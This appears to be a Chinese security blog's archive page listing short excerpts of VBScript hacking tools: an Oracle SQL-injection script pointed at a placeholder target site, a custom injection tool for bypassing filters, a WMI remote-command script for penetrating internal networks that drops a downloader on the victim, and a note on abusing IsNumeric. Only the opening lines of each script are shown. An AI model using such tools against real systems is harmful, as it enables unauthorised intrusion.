koXoracle.vbs

日期: 2010/01/09 分类: 技术杂文 标签: , 添加回复

http://hi.baidu.com/myvbscript/blog/item/5d3fed1f2eb7dd01314e151f.html

‘感谢marcos,人才呀,巧妙的递归;2010我懒了,以后再加猜字段值内容吧
Set oracleXML = CreateObject(“Microsoft.XMLHTTP”)
TargetURL = http://www.target.com/information/view.asp?bna=abc ‘自行修改
RightWord = “正常页面字符串” ’自行修改
if (lcase(right(wscript.fullname,11))=”wscript.exe”) then
wscript.echo “Execute it under the cmd.exe Plz! Thx.”
wscript.quit
end If

阅读全文

SQLids.vbs 0.2版

日期: 2009/09/22 分类: 技术杂文 标签: , 添加回复

作者:lcx

‘今天搞了个网站,注入点过滤得很变态,工具都不能跑,于是写了这个东东:

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))=”Wscript.exe”) Then
Wscript.Quit
End If
if arg.count=0 then

阅读全文

Rcmd.vbs 1.01修正版

日期: 2009/07/08 分类: 技术杂文 标签: , , 添加回复

来源 : lcx

原来是NP写的,代码在这里

http://hi.baidu.com/myvbscript/blog/item/92e5d93dd18218ce9e3d6227.html

我修正了几个小bug,加了一个在对方机器上直接生成一个down.vbs,用来下载用。这个down.vbs的用法看这里:

http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html

阅读全文

Remote CMD With WMI

日期: 2009/06/25 分类: 技术杂文 标签: , 添加回复

From: WEB安全手册

一个vbs脚本,渗透内网用的。

On Error Resume Next
Set outstreem=Wscript.stdout
If (LCase(Right(Wscript.fullname,11))=”Wscript.exe”) Then
Set objShell=Wscript.CreateObject(“Wscript.shell”)
objShell.Run(“cmd.exe /k cscript //nologo “&Chr(34)&Wscript.ScriptFullName&Chr(34))
Wscript.Quit
End If

阅读全文

渗透中巧用IsNumeric函数

日期: 2009/04/07 分类: 技术杂文 标签: , , 1 个回复

来源: http://www.pcsec.org/
Author: Tr4c3[at]126.com
先看Vbs手册里的描述:

IsNumeric 函数
返回 Boolean 值指明表达式的值是否为数字。

IsNumeric(expression)

expression 参数可以是任意表达式。

说明
如果整个 expression 被识别为数字,IsNumeric 函数返回 True;否则函数返回 False。如果 expression 是日期表达式,IsNumeric 函数返回 False。

一些程序员在写代码的时候比较喜欢用isnumeric来判断参数是否为数字型,

阅读全文